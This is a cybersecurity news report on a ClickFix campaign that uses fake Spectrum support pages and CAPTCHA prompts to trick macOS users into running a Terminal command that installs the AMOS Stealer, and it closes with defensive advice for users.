A new ClickFix malware campaign has emerged targeting macOS users through fake Spectrum support websites. Cybersecurity researchers from CloudSEK have uncovered a sophisticated scheme where attackers mimic Spectrum, a major U.S. telecom provider, by creating fraudulent domains that resemble its real support portals. These fake sites deceive users with CAPTCHA prompts, which display error messages and prompt victims to click an ‘Alternative Verification’ button. This action copies a malicious command to the clipboard, which macOS users are then instructed to paste and execute in Terminal. The command installs the AMOS Stealer, a known malware that extracts sensitive data such as passwords, cryptocurrency wallet keys, browser autofill data, and saved cookies.
The campaign is believed to have been orchestrated by Russian-speaking hackers, evidenced by Russian comments within the malware code and flawed delivery infrastructure. The ClickFix technique, which has been active since March 2024, relies on social engineering, exploiting users’ trust in familiar interfaces to execute malicious code. This evolving threat highlights the need for heightened vigilance, with experts urging users to be skeptical of CAPTCHA prompts, use strong antivirus software, and enable two-factor authentication to protect against such attacks.
Researchers have identified that the campaign uses a method known as ClickFix, which has been employed by cybercriminals since at least March 2024. The technique involves luring users through fake online verification prompts, which appear legitimate but are designed to trick victims into running malicious commands. In previous iterations of this attack, similar methods have been used to target Windows users, with fake error messages from Google Chrome, Microsoft Word, and OneDrive used to push malicious payloads. However, this latest campaign targets macOS, leveraging the user’s familiarity with macOS-specific interfaces to execute the attack.
Security experts emphasize that the AMOS Stealer is particularly dangerous due to its ability to bypass security protections and access sensitive data. Once installed, the malware can harvest credentials, disable security measures, and exfiltrate data to remote servers. The use of legitimate macOS commands to execute the malware makes it more challenging to detect, as it mimics normal system operations.
Users are advised to be cautious of any CAPTCHA prompts that ask them to paste commands into Terminal, as this is a clear indicator of a scam. Cybersecurity professionals recommend implementing a range of protective measures, including using robust antivirus software, enabling two-factor authentication, and keeping all systems updated to patch known vulnerabilities. These steps are crucial in preventing the spread of malware like AMOS, which poses a significant risk to both individual users and organizations.
Additionally, it is important for users to verify the legitimacy of any online links or emails they receive, especially those that mimic services they are familiar with. If an email or website seems suspicious, users should avoid clicking on any links and instead access the service’s official website directly. Regular monitoring of online accounts for unusual activity is also recommended, as early detection can prevent further damage from malware infections.